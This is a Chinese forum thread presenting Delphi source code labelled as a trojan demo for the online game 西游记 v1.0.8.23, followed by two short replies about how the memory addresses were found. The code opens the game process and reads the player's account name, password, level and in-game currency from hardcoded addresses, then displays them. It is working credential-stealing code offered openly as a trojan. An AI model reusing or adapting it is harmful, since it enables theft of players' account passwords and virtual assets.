西游记 v1.0.8.23木马程序演示(0)

//西游记 v1.0.8.23木马程序演示//蛮简单的，不用扫基址，不用指令hook，都是静态的。。。 有兴趣的用金山游侠搜索去吧 哈哈program xy;uses Windows;function inttostr(i:integer):string;begin Str(i,Result);end;procedure TG;var Num: Cardinal; ProcessID: Thandle; ProcID: Thandle; Ghwnd: Thandle; Ecxi: Cardinal; r_dengji,r_sdjinqian,r_jinqian,r_yuanbao,r_sdyuanbao:Cardinal; r_Name:array[0..31] of WideChar; r_pass:array[0..31] of WideChar; r_Name1:integer;begin Ghwnd := FindWindow('LineKongGame', nil); //获取窗口 if Ghwnd = 0 then Exit; GetWindowThreadProcessId(Ghwnd, ProcID); //进程ID ProcessID := OpenProcess(PROCESS_ALL_ACCESS, False, ProcID); // 进程句柄 if ProcessID = 0 then Exit; ReadProcessMemory(ProcessID, Pointer( $188262c ), @r_dengji, 4, Num); ReadProcessMemory(ProcessID, Pointer( $1882d0c ), @r_jinqian, 4, Num); ReadProcessMemory(ProcessID, Pointer( $1882d10 ), @r_sdjinqian, 4, Num); ReadProcessMemory(ProcessID, Pointer( $1882d1c ), @r_sdyuanbao, 4, Num); ReadProcessMemory(ProcessID, Pointer( $1882d20 ), @r_yuanbao, 4, Num); ReadProcessMemory(ProcessID, Pointer($10677b4), @r_Name, 32, Num); ReadProcessMemory(ProcessID, Pointer($106e048), @r_pass, 32, Num); CloseHandle(ProcessID); MessageBox(0,PChar('账户:'+WideCharToString( r_Name )+'密码：'+WideCharToString( r_pass ) +'等级：'+inttostr(r_dengji) +'元宝：'+inttostr(r_sdyuanbao) +'未锁定元宝：'+inttostr(r_yuanbao) +'金钱：'+inttostr(r_sdjinqian)+'未锁定金钱：'+inttostr(r_jinqian) ),0,0);end;begin TG;end.

好程序啊，不过这些地址是怎么得来的？ReadProcessMemory(ProcessID, Pointer( $188262c ), @r_dengji, 4, Num); ReadProcessMemory(ProcessID, Pointer( $1882d0c ), @r_jinqian, 4, Num); ReadProcessMemory(ProcessID, Pointer( $1882d10 ), @r_sdjinqian, 4, Num); ReadProcessMemory(ProcessID, Pointer( $1882d1c ), @r_sdyuanbao, 4, Num); ReadProcessMemory(ProcessID, Pointer( $1882d20 ), @r_yuanbao, 4, Num);

地址应该是不断测试的结果